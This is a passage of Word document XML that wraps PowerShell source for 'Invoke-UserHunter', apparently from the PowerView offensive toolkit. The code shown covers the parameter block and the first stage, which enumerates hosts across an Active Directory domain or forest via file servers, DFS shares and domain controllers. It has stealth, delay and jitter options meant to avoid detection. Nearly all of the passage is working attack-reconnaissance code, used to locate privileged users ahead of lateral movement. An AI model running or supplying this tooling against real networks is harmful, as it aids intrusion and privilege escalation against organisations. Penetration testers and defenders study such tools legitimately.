    <w:p w14:paraId="2B4ED0CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09AD1953" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B13841" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $AdminCount,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C7EACF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4587CED5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06168DBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $AllowDelegation,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A481C4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B724F86" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B619F32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CheckAccess,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2520FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A6FBCB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA694E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $StopOnSuccess,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB9AD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72600F08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2D9972" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NoPing,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726487D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="15BC7D15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B173BCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Delay = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455E6258" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="50EFA468" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Double]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14830CD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Jitter = .3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02904C88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74D4A843" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D480EA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7066CDE5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32F5B0FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1693E235" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4259CE3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A49E2D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FFC11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ShowAll,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5E739" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="004467C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4CF5C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchForest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327CF87C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F556936" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB2375A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Stealth,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72023F8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B4CE57A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300C70D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateSet("DFS","DC","File","All")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68516A5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $StealthSource ="All",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1669E9C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7839F3B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246D84A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ForeignUsers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E48CFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2501944A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A28E35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,100)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F36715B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Threads,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A76B55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5FCD42FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608FDD11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Poll = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A20CA5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27002EEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D14E51B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A620B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4140DEA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($PSBoundParameters['Debug']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AA508E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DebugPreference = 'Continue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E15803" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFA51D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="712199E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[*] Running Invoke-UserHunter with delay of $Delay"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31198716" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B6026F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C2BE1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34048B8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # First we build the host target set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A3D12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB5B2C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #####################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5897806F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="472718DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ComputerFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F19766" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # if we're using a host list, read the targets in and add them to the target list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C49F7F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = Get-Content -Path $ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBAF614" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F4963" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3D2F3900" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$ComputerName) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA8D44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [Array]$ComputerName = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FA427E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FD5BEFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560C698A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = @($Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539C27A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E69904" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($SearchForest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4088E800" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get ALL the domains in the forest to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F390EA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF427E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AAF5AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009FA8E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # use the local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081F11C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = @( (Get-NetDomain).name )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF94500" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D8EA34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179D9CE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Stealth) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14982694" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Stealth mode! Enumerating commonly used servers"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0CB024" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Stealth source: $StealthSource"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCE2DA4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69B9E13D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B02DA52" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if (($StealthSource -eq "File") -or ($StealthSource -eq "All")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577E4A9D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Write-Verbose "[*] Querying domain $Domain for File Servers..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2301462C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ComputerName += Get-NetFileServer -Domain $Domain -DomainController $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EDD75C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796BA1EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if (($StealthSource -eq "DFS") -or ($StealthSource -eq "All")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313052E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Write-Verbose "[*] Querying domain $Domain for DFS Servers..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E922E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ComputerName += Get-DFSshare -Domain $Domain -DomainController $DomainController | ForEach-Object {$_.RemoteServerName}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEC366D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0FD3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if (($StealthSource -eq "DC") -or ($StealthSource -eq "All")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3000ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        Write-Verbose "[*] Querying domain $Domain for Domain Controllers..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA04FEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.dnshostname}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20270A0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B924C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC3FB5F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028F3DA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C4CB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056D7CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Write-Verbose "[*] Querying domain $Domain for hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA1B879" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7D2EF476" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Arguments = @{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D655266" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        'Domain' = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316CC87" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        'DomainController' = $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB116BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        'ADSpath' = $ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C1ECE9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        'Filter' = $ComputerFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAA837B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        'Unconstrained' = $Unconstrained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A82E18C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1385DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A032621" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $ComputerName += Get-NetComputer @Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DABEB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D26C10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A885A89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C060081" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # remove any null target hosts, uniquify the list and shuffle it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E1A53" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2854A43E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($($ComputerName.Count) -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522D99F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "No hosts found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A778DF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178E0749" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA4B18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BDFADD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Poll -gt 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1BD317" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "[*] Polling for $Poll seconds. Automatically enabling threaded mode."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DDA9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($ComputerName.Count -gt 100) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C38C141" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "Too many hosts to poll! Try fewer than 100."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685ABCFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C114911" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
